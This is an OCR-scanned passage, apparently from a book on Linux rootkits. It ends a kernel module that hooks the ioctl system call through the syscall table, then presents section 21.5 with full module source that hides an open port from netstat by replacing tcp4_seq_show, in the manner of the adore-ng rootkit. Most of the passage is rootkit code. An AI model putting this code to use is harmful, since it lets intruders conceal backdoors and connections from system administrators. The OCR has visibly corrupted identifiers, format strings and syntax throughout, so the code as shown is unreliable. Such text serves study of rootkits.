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al 
int init_module(vo1d) 


{ 
find sys call table(); 


orig ioctl = (woid *)sys call table[ NR ioctl); 
sys call table[ NR ioctl] = (unsigned long)new ioctl; 
return 0; 


} 


void cleanup module (void) 
{ 
sys call table[ NR ioctl) = (unsigned long)orig ioctl; 





21.5. Hiding from netstat 


The netstat utility reads information from the /proc/net/tcp, /proc/net/udp, and other files 
(consult the netstat man for the complete list of the files), Thus, if the necessary lines with 
information about connections or open ports are hidden when these files are read, netstat 
will not show them in its output. 

I, however, consider a different method, the one used in the adore-ng rootkit. It is based 
on replacing the pointer to the tcp4 seq show() function in the tcp seq afinfo structure. 
The netstat utility uses this function in its operation. In the replacement function, called 
hacked tcp4 seq show(), the strnstr() function is called to search in seq->buf for the sub- 
string containing the hexadecimal number of the port specified to be hidden. The implement- 
ing source code is shown tn Listing 21.5. 





include <linux/module.h> 
#include <linux/proc_fs.h> 
Finclude <linux/init.h> 


#include <net/tcp.h> 


/* Constant from the /net/ipv4/tcp_ipv4.c file */ 
faefine TMPS2 150 


/* Port number to hide */ 
#define PORT TO HIDE 80 


MODULE LICENSE ("GPL"); 
int (*orig tcp4 seq show) (struct seq file*, void *) = NULL; 


char *strnstr(const char *haystack, const char *needle, size t n)} 
{ 
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char *s = strstr(haystack, needle); 

if (s == NULL) 
return NULL; 

if ( (8 - haystack + strlen(needle)) <= n) 
return s; 

else 
return NULL; 

} 


int hacked _tcp4 seq _show(struct seq _ file *seq, void *v) 
{ 
int retval = orig_tcp4_ seq_show(seq, v); 


char port([12]; 
sprintf (port, "$04K", PORT _TO HIDE); 


if (strnstr(seq->buf + seq->count - TMPSZ, port, TMPS2)} 
seq->count -= TMPS2; 
return retval; 


int init module (void) 
{ 
struct tcp seq afinfo *our_afinfo = NULL; 
struct proc dir entry *our_dir_ entry = proc _net-—>subdir; 


while (stromp(our_dir_entry->name, "tep")) 
our dir entry = our_dir entry->next; 


if { (our_afinfo = (struct tcp_seq_afinfo*)our_dir_entry->data) ) 


orig _tcp4 seq show = our_afinfo->seq_show; 
our afinfo->seq show = hacked tep4 seq show; 
I 


return 0; 
} 


void cleanup module (void) 
{ 
struct tcp seq_afinfo *our_afinfo = NULL; 
struct proc dir entry *our dir entry = proc net->subdir; 


while (strcomp(our_dir_entry->name, “tcp")) 
our dir entry = our _dir entry->next; 


if { (our_afinfo = (struct tep_seq afinfo *)our dir entry->data) ) 
{ 

our afinfo->seq show = orig tcp4 seq show; 
} 
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